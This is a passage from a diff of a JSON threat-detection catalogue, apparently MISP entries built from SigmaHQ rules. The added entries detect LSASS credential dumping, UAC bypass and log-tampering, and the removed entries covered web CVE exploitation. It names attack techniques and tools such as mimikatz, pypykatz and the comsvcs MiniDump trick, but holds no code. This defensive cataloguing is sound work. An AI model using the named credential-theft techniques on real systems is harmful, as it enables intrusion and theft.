Dulce, Dekel Paz", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "rpc_firewall_atsvc_recon.yml", + "level": "high", + "logsource.category": "application", + "logsource.product": "rpc_firewall", + "refs": [ + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://attack.mitre.org/tactics/TA0007/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/zeronetworks/rpcfirewall", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_atsvc_recon.yml" + ], + "tags": "No established tags" + }, + "uuid": "f177f2bc-5f3e-4453-b599-57eefce9a59c", + "value": "Remote Schedule Task Recon via AtScv" + }, + { + "description": "Detects PowerShell processes requesting access to \"lsass.exe\"", + "meta": { + "author": "oscd.community, Natalia Shornikova", + "creation_date": "2020/10/06", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_access_win_winapi_in_powershell_credentials_dumping.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_winapi_in_powershell_credentials_dumping.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "0f920ebe-7aea-4c54-b202-9aa0c609cfe5", + "value": "Potential Credential Dumping Attempt Via PowerShell" + }, + { + "description": "Detects process access to LSASS memory with suspicious access flags and from a suspicious folder", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/11/27", + "falsepositive": [ + "Legitimate software accessing LSASS process for legitimate reason" + ], + "filename": "proc_access_win_susp_proc_access_lsass_susp_source.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" + ] + }, + "uuid": "fa34b441-961a-42fa-a100-ecc28c886725", + "value": "LSASS Access from Program in Suspicious Folder" + }, + { + "description": "Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/10/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_access_win_lsass_dump_comsvcs_dll.yml", + "level": "critical", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/shantanukhande/status/1229348874298388484", + "https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_dump_comsvcs_dll.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "a49fa4d5-11db-418c-8473-1e014a8dd462", + "value": "Lsass Memory Dump via Comsvcs DLL" + }, + { + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "meta": { + "author": "Nik Seetharaman", + "creation_date": "2018/07/16", + "falsepositive": [ + "Legitimate CMSTP use (unlikely in modern enterprise environments)" + ], + "filename": "proc_access_win_cmstp_execution_by_access.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_cmstp_execution_by_access.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.003", + "attack.execution", + "attack.t1559.001", + "attack.g0069", + "attack.g0080", + "car.2019-04-001" + ] + }, + "uuid": "3b4b232a-af90-427c-a22f-30b0c0837b95", + "value": "CMSTP Execution Process Access" + }, + { + "description": "COM interface (EditionUpgradeManager) that is not used by standard executables.", + "meta": { + "author": "oscd.community, Dmitry Uchakin", + "creation_date": "2020/10/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_access_win_load_undocumented_autoelevated_com_interface.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://www.snip2code.com/Snippet/4397378/UAC-bypass-using-EditionUpgradeManager-C/", + "https://gist.github.com/hfiref0x/de9c83966623236f5ebf8d9ae2407611", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_load_undocumented_autoelevated_com_interface.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "fb3722e4-1a06-46b6-b772-253e2e7db933", + "value": "Load Undocumented Autoelevated COM Interface" + }, + { + "description": "Detects LSASS process access by pypykatz for credential dumping.", "meta": { "author": "Bhabesh Raj", - "creation_date": "2020/12/08", + "creation_date": "2021/08/03", "falsepositive": [ "Unknown" ], - "filename": "web_cve_2018_13379_fortinet_preauth_read_exploit.yml", + "filename": "proc_access_win_pypykatz_cred_dump_lsass_access.yml", "level": "critical", - "logsource.category": "webserver", - "logsource.product": "No established product", + "logsource.category": "process_access", + "logsource.product": "windows", "refs": [ - "https://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2018_13379_fortinet_preauth_read_exploit.yml" + "https://github.com/skelsec/pypykatz", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_pypykatz_cred_dump_lsass_access.yml" ], "tags": [ - "attack.initial_access", - "attack.t1190" + "attack.credential_access", + "attack.t1003.001" ] }, - "uuid": "a2e97350-4285-43f2-a63f-d0daff291738", - "value": "Fortinet CVE-2018-13379 Exploitation" + "uuid": "7186e989-4ed7-4f4e-a656-4674b9e3e48b", + "value": "Credential Dumping by Pypykatz" }, { - "description": "Detects access to a webshell dropped into a keystore folder on the WebLogic server", + "description": "Detects suspect access to svchost process memory such as that used by Invoke-Phantom to kill the winRM windows event logging service.", "meta": { - "author": "Florian Roth", - "creation_date": "2018/07/22", - "falsepositive": [ - "Unknown" - ], - "filename": "web_cve_2018_2894_weblogic_exploit.yml", - "level": "critical", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://twitter.com/pyn3rd/status/1020620932967223296", - "https://github.com/LandGrey/CVE-2018-2894", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2018_2894_weblogic_exploit.yml" - ], - "tags": [ - "attack.t1190", - "attack.initial_access", - "attack.persistence", - "attack.t1505.003", - "cve.2018.2894" - ] - }, - "uuid": "37e8369b-43bb-4bf8-83b6-6dd43bda2000", - "value": "Oracle WebLogic Exploit" - }, - { - "description": "Detects CVE-2019-11510 exploitation attempt - URI contains Guacamole", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/11/18", - "falsepositive": [ - "Unknown" - ], - "filename": "web_cve_2019_11510_pulsesecure_exploit.yml", - "level": "critical", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://www.exploit-db.com/exploits/47297", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2019_11510_pulsesecure_exploit.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "2dbc10d7-a797-49a8-8776-49efa6442e60", - "value": "Pulse Secure Attack CVE-2019-11510" - }, - { - "description": "Detects CVE-2019-19781 exploitation attempt against Citrix Netscaler, Application Delivery Controller and Citrix Gateway Attack", - "meta": { - "author": "Arnim Rupp, Florian Roth", + "author": "Tim Burrell", "creation_date": "2020/01/02", "falsepositive": [ "Unknown" ], - "filename": "web_cve_2019_19781_citrix_exploit.yml", - "level": "critical", - "logsource.category": "webserver", - "logsource.product": "No established product", + "filename": "proc_access_win_invoke_phantom.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", "refs": [ - "https://support.citrix.com/article/CTX267679", - "https://support.citrix.com/article/CTX267027", - "https://isc.sans.edu/diary/25686", - "https://twitter.com/mpgn_x64/status/1216787131210829826", - "https://github.com/x1sec/CVE-2019-19781/blob/25f7ab97275b2d41800bb3414dac8ca3a78af7e5/CVE-2019-19781-DFIR.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2019_19781_citrix_exploit.yml" + "https://twitter.com/timbmsft/status/900724491076214784", + "https://github.com/hlldz/Invoke-Phant0m", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_invoke_phantom.yml" ], "tags": [ - "attack.initial_access", - "attack.t1190" + "attack.defense_evasion", + "attack.t1562.002" ] }, - "uuid": "ac5a6409-8c89-44c2-8d64-668c29a2d756", - "value": "Citrix Netscaler Attack CVE-2019-19781" + "uuid": "166e9c50-8cd9-44af-815d-d1f0c0e90dde", + "value": "Suspect Svchost Memory Asccess" }, { - "description": "Detects the exploitation of the Confluence vulnerability described in CVE-2019-3398", + "description": "Detects a possible process memory dump that uses the white-listed filename like TrolleyExpress.exe as a way to dump the lsass process memory without Microsoft Defender interference", "meta": { "author": "Florian Roth", - "creation_date": "2020/05/26", + "creation_date": "2022/02/10", "falsepositive": [ - "Unknown" + "Unlikely, since these tools shouldn't access lsass.exe at all" ], - "filename": "web_cve_2019_3398_confluence.yml", - "level": "critical", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://devcentral.f5.com/s/articles/confluence-arbitrary-file-write-via-path-traversal-cve-2019-3398-34181", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2019_3398_confluence.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "e9bc39ae-978a-4e49-91ab-5bd481fc668b", - "value": "Confluence Exploitation CVE-2019-3398" - }, - { - "description": "Detects CVE-2020-0688 Exploitation attempts", - "meta": { - "author": "NVISO", - "creation_date": "2020/02/27", - "falsepositive": [ - "Unknown" - ], - "filename": "web_cve_2020_0688_exchange_exploit.yml", + "filename": "proc_access_win_lsass_memdump_evasion.yml", "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", + "logsource.category": "process_access", + "logsource.product": "windows", "refs": [ - "https://github.com/Ridter/cve-2020-0688", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_0688_exchange_exploit.yml" + "https://twitter.com/_xpn_/status/1491557187168178176", + "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz", + "https://twitter.com/mrd0x/status/1460597833917251595", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump_evasion.yml" ], "tags": [ - "attack.initial_access", - "attack.t1190" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ] }, - "uuid": "7c64e577-d72e-4c3d-9d75-8de6d1f9146a", - "value": "CVE-2020-0688 Exploitation Attempt" + "uuid": "4be8b654-0c01-4c9d-a10c-6b28467fc651", + "value": "LSASS Access from White-Listed Processes" }, { - "description": "Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688", + "description": "Detects usage of mimikatz through WinRM protocol by monitoring access to lsass process by wsmprovhost.exe.", "meta": { - "author": "Florian Roth", - "creation_date": "2020/02/29", - "falsepositive": [ - "Unknown" - ], - "filename": "web_cve_2020_0688_msexchange.yml", - "level": "critical", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_0688_msexchange.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "fce2c2e2-0fb5-41ab-a14c-5391e1fd70a5", - "value": "CVE-2020-0688 Exchange Exploitation via Web Log" - }, - { - "description": "Detects CVE-2020-10148 SolarWinds Orion API authentication bypass attempts", - "meta": { - "author": "Bhabesh Raj, Tim Shelton", - "creation_date": "2020/12/27", - "falsepositive": [ - "Unknown" - ], - "filename": "web_cve_2020_10148_solarwinds_exploit.yml", - "level": "critical", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://kb.cert.org/vuls/id/843464", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_10148_solarwinds_exploit.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "5a35116f-43bc-4901-b62d-ef131f42a9af", - "value": "CVE-2020-10148 SolarWinds Orion API Auth Bypass" - }, - { - "description": "Detects exploitation attempts on WebLogic servers", - "meta": { - "author": "Florian Roth", - "creation_date": "2020/11/02", - "falsepositive": [ - "Unknown" - ], - "filename": "web_cve_2020_14882_weblogic_exploit.yml", - "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://isc.sans.edu/diary/26734", - "https://twitter.com/jas502n/status/1321416053050667009?s=20", - "https://twitter.com/sudo_sudoka/status/1323951871078223874", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_14882_weblogic_exploit.yml" - ], - "tags": [ - "attack.t1190", - "attack.initial_access", - "cve.2020.14882" - ] - }, - "uuid": "85d466b0-d74c-4514-84d3-2bdd3327588b", - "value": "Oracle WebLogic Exploit CVE-2020-14882" - }, - { - "description": "Detects the exploitation of the TerraMaster TOS vulnerability described in CVE-2020-28188", - "meta": { - "author": "Bhabesh Raj", - "creation_date": "2021/01/25", - "falsepositive": [ - "Unknown" - ], - "filename": "web_cve_2020_28188_terramaster_rce_exploit.yml", - "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/", - "https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_28188_terramaster_rce_exploit.yml" - ], - "tags": [ - "attack.t1190", - "attack.initial_access", - "cve.2020.28188" - ] - }, - "uuid": "15c312b9-00d0-4feb-8870-7d940a4bdc5e", - "value": "TerraMaster TOS CVE-2020-28188" - }, - { - "description": "Detects exploitation attempts on Cisco ASA FTD systems exploiting CVE-2020-3452 with a status code of 200 (sccessful exploitation)", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/01/07", - "falsepositive": [ - "Unknown" - ], - "filename": "web_cve_2020_3452_cisco_asa_ftd.yml", - "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://twitter.com/aboul3la/status/1286012324722155525", - "https://github.com/darklotuskdb/CISCO-CVE-2020-3452-Scanner-Exploiter", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_3452_cisco_asa_ftd.yml" - ], - "tags": [ - "attack.t1190", - "attack.initial_access", - "cve.2020.3452" - ] - }, - "uuid": "aba47adc-4847-4970-95c1-61dce62a8b29", - "value": "Cisco ASA FTD Exploit CVE-2020-3452" - }, - { - "description": "Detects the exploitation attempt of the vulnerability found in F5 BIG-IP and described in CVE-2020-5902", - "meta": { - "author": "Florian Roth", - "creation_date": "2020/07/05", - "falsepositive": [ - "Unknown" - ], - "filename": "web_cve_2020_5902_f5_bigip.yml", - "level": "critical", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://support.f5.com/csp/article/K52145254", - "https://www.ptsecurity.com/ww-en/about/news/f5-fixes-critical-vulnerability-discovered-by-positive-technologies-in-big-ip-application-delivery-controller/", - "https://twitter.com/yorickkoster/status/1279709009151434754", - "https://www.criticalstart.com/f5-big-ip-remote-code-execution-exploit/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_5902_f5_bigip.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "44b53b1c-e60f-4a7b-948e-3435a7918478", - "value": "CVE-2020-5902 F5 BIG-IP Exploitation Attempt" - }, - { - "description": "Detects exploitation attempt against Citrix Netscaler, Application Delivery Controller (ADS) and Citrix Gateway exploiting vulnerabilities reported as CVE-2020-8193 and CVE-2020-8195", - "meta": { - "author": "Florian Roth", - "creation_date": "2020/07/10", - "falsepositive": [ - "Unknown" - ], - "filename": "web_cve_2020_8193_8195_citrix_exploit.yml", - "level": "critical", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://support.citrix.com/article/CTX276688", - "https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/", - "https://dmaasland.github.io/posts/citrix.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_8193_8195_citrix_exploit.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "0d0d9a8a-a49e-4e27-b061-7ce4b936cfb7", - "value": "Citrix ADS Exploitation CVE-2020-8193 CVE-2020-8195" - }, - { - "description": "Detects exploitation of vulnerabilities in Arcadyan routers as reported in CVE-2021-20090 and CVE-2021-20091.", - "meta": { - "author": "Bhabesh Raj", - "creation_date": "2021/08/24", - "falsepositive": [ - "Unknown" - ], - "filename": "web_cve_2021_20090_2021_20091_arcadyan_router_exploit.yml", - "level": "critical", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2", - "https://www.tenable.com/security/research/tra-2021-13", - "https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_20090_2021_20091_arcadyan_router_exploit.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190", - "cve.2021.20090", - "cve.2021.20091" - ] - }, - "uuid": "f0500377-bc70-425d-ac8c-e956cd906871", - "value": "Arcadyan Router Exploitations" - }, - { - "description": "Detects the exploitation of the WebLogic server vulnerability described in CVE-2021-2109", - "meta": { - "author": "Bhabesh Raj", - "creation_date": "2021/01/20", - "falsepositive": [ - "Unknown" - ], - "filename": "web_cve_2021_2109_weblogic_rce_exploit.yml", - "level": "critical", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://twitter.com/pyn3rd/status/1351696768065409026", - "https://mp.weixin.qq.com/s/wX9TMXl1KVWwB_k6EZOklw", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_2109_weblogic_rce_exploit.yml" - ], - "tags": [ - "attack.t1190", - "attack.initial_access", - "cve.2021.2109" - ] - }, - "uuid": "687f6504-7f44-4549-91fc-f07bab065821", - "value": "Oracle WebLogic Exploit CVE-2021-2109" - }, - { - "description": "Detects the exploitation of VSphere Remote Code Execution vulnerability as described in CVE-2021-21972", - "meta": { - "author": "Bhabesh Raj", - "creation_date": "2021/02/24", - "falsepositive": [ - "OVA uploads to your VSphere appliance" - ], - "filename": "web_cve_2021_21972_vsphere_unauth_rce_exploit.yml", - "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://www.vmware.com/security/advisories/VMSA-2021-0002.html", - "https://f5.pm/go-59627.html", - "https://swarm.ptsecurity.com/unauth-rce-vmware", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_21972_vsphere_unauth_rce_exploit.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "179ed852-0f9b-4009-93a7-68475910fd86", - "value": "CVE-2021-21972 VSphere Exploitation" - }, - { - "description": "Detects the exploitation of the VMware View Planner vulnerability described in CVE-2021-21978", - "meta": { - "author": "Bhabesh Raj", - "creation_date": "2020/03/10", - "falsepositive": [ - "Unknown" - ], - "filename": "web_cve_2021_21978_vmware_view_planner_exploit.yml", - "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://twitter.com/wugeej/status/1369476795255320580", - "https://paper.seebug.org/1495/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_21978_vmware_view_planner_exploit.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190", - "cve.2021.21978" - ] - }, - "uuid": "77586a7f-7ea4-4c41-b19c-820140b84ca9", - "value": "CVE-2021-21978 Exploitation Attempt" - }, - { - "description": "Detects exploitation attempts using file upload vulnerability CVE-2021-22005 in the VMWare vCenter Server.", - "meta": { - "author": "Sittikorn S", - "creation_date": "2021/09/24", - "falsepositive": [ - "Vulnerability Scanning" - ], - "filename": "web_cve_2021_22005_vmware_file_upload.yml", - "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://kb.vmware.com/s/article/85717", - "https://www.tenable.com/blog/cve-2021-22005-critical-file-upload-vulnerability-in-vmware-vcenter-server", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_22005_vmware_file_upload.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "b014ea07-8ea0-4859-b517-50a4e5b7ecec", - "value": "VMware vCenter Server File Upload CVE-2021-22005" - }, - { - "description": "Detects CVE-2021-22123 exploitation attempt against Fortinet WAFs", - "meta": { - "author": "Bhabesh Raj, Florian Roth", - "creation_date": "2021/08/19", - "falsepositive": [ - "Unknown" - ], - "filename": "web_cve_2021_22123_fortinet_exploit.yml", - "level": "critical", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_22123_fortinet_exploit.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "f425637f-891c-4191-a6c4-3bb1b70513b4", - "value": "Fortinet CVE-2021-22123 Exploitation" - }, - { - "description": "This rule detects exploitation attempts using Pulse Connect Secure(PCS) vulnerability (CVE-2021-22893)", - "meta": { - "author": "Sittikorn S", - "creation_date": "2021/06/29", - "falsepositive": [ - "Vulnerability Scanning" - ], - "filename": "web_cve_2021_22893_pulse_secure_rce_exploit.yml", - "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html", - "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_22893_pulse_secure_rce_exploit.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "5525edac-f599-4bfd-b926-3fa69860e766", - "value": "Pulse Connect Secure RCE Attack CVE-2021-22893" - }, - { - "description": "Detects the exploitation of the Wazuh RCE vulnerability described in CVE-2021-26814", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/05/22", - "falsepositive": [ - "Unknown" - ], - "filename": "web_cve_2021_26814_wzuh_rce.yml", - "level": "high", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://github.com/WickdDavid/CVE-2021-26814/blob/6a17355a10ec4db771d0f112cbe031e418d829d5/PoC.py", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_26814_wzuh_rce.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190", - "cve.2021.21978", - "cve.2021.26814" - ] - }, - "uuid": "b9888738-29ed-4c54-96a4-f38c57b84bb3", - "value": "Exploitation of CVE-2021-26814 in Wazuh" - }, - { - "description": "When exploiting this vulnerability with CVE-2021-26858, an SSRF attack is used to manipulate virtual directories", - "meta": { - "author": "frack113", - "creation_date": "2021/08/10", + "author": "Patryk Prauze - ING Tech", + "creation_date": "2019/05/20", "falsepositive": [ "Unlikely" ], - "filename": "web_cve_2021_26858_iis_rce.yml", - "level": "critical", - "logsource.category": "webserver", + "filename": "proc_access_win_mimikatz_trough_winrm.yml", + "level": "high", + "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://bi-zone.medium.com/hunting-down-ms-exchange-attacks-part-1-proxylogon-cve-2021-26855-26858-27065-26857-6e885c5f197c", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_26858_iis_rce.yml" + "https://pentestlab.blog/2018/05/15/lateral-movement-winrm/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_mimikatz_trough_winrm.yml" ], - "tags": "No established tags" + "tags": [ + "attack.credential_access", + "attack.execution", + "attack.t1003.001", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006", + "attack.s0002" + ] }, - "uuid": "effee1f6-a932-4297-a81f-acb44064fa3a", - "value": "ProxyLogon Reset Virtual Directories Based On IIS Log" + "uuid": "aa35a627-33fb-4d04-a165-d33b4afca3e8", + "value": "Mimikatz through Windows Remote Management" }, { - "description": "Detects successful exploitation of Exchange vulnerability as reported in CVE-2021-28480", + "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", "meta": { "author": "Florian Roth", - "creation_date": "2021/05/14", + "creation_date": "2012/06/27", + "falsepositive": [ + "Actual failures in lsass.exe that trigger a crash dump (unlikely)", + "Unknown cases in which WerFault accesses lsass.exe" + ], + "filename": "proc_access_win_lsass_werfault.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://github.com/helpsystems/nanodump/commit/578116faea3d278d53d70ea932e2bbfe42569507", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_werfault.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" + ] + }, + "uuid": "e5b33f7d-eb93-48b6-9851-09e1e610b6d7", + "value": "WerFault Accassing LSASS" + }, + { + "description": "Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro", + "meta": { + "author": "John Lambert (tech), Florian Roth (rule)", + "creation_date": "2017/03/04", "falsepositive": [ "Unknown" ], - "filename": "web_cve_2021_28480_exchange_exploit.yml", + "filename": "proc_access_win_malware_verclsid_shellcode.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/JohnLaTwC/status/837743453039534080", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_malware_verclsid_shellcode.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ] + }, + "uuid": "b7967e22-3d7e-409b-9ed5-cdae3f9243a1", + "value": "Malware Shellcode in Verclsid Target Process" + }, + { + "description": "Detects LSASS process access by LaZagne for credential dumping.", + "meta": { + "author": "Bhabesh Raj, Jonhnathan Ribeiro", + "creation_date": "2020/09/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_access_win_lazagne_cred_dump_lsass_access.yml", "level": "critical", - "logsource.category": "webserver", - "logsource.product": "No established product", + "logsource.category": "process_access", + "logsource.product": "windows", "refs": [ - "https://twitter.com/GossiTheDog/status/1392965209132871683?s=20", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_28480_exchange_exploit.yml" + "https://twitter.com/bh4b3sh/status/1303674603819081728", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lazagne_cred_dump_lsass_access.yml" ], "tags": [ - "attack.initial_access", - "attack.t1190" + "attack.credential_access", + "attack.t1003.001", + "attack.s0349" ] }, - "uuid": "a2a9d722-0acb-4096-bccc-daaf91a5037b", - "value": "Exchange Exploitation CVE-2021-28480" + "uuid": "4b9a8556-99c4-470b-a40c-9c8d02c77ed0", + "value": "Credential Dumping by LaZagne" }, { - "description": "Detects the exploitation of Microsoft Exchange ProxyToken vulnerability as described in CVE-2021-33766", + "description": "Detects when a process, such as mimikatz, accesses the memory of svchost to dump credentials", "meta": { - "author": "Florian Roth, Max Altgelt, Christian Burkard", - "creation_date": "2021/08/30", + "author": "Florent Labouyrie", + "creation_date": "2021/04/30", "falsepositive": [ - "Unknown" + "Non identified legit exectubale" ], - "filename": "web_cve_2021_33766_msexchange_proxytoken.yml", - "level": "critical", - "logsource.category": "webserver", - "logsource.product": "No established product", - "refs": [ - "https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server", - "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_33766_msexchange_proxytoken.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190" - ] - }, - "uuid": "56973b50-3382-4b56-bdf5-f51a3183797a", - "value": "CVE-2021-33766 Exchange ProxyToken Exploitation" - }, - { - "description": "Detects suspicious access to URLs that was noticed in cases in which attackers exploitated the ADSelfService vulnerability CVE-2021-40539", - "meta": { - "author": "Tobias Michalski, Max Altgelt", - "creation_date": "2021/09/20", - "falsepositive": [ - "Unknown" - ], - "filename": 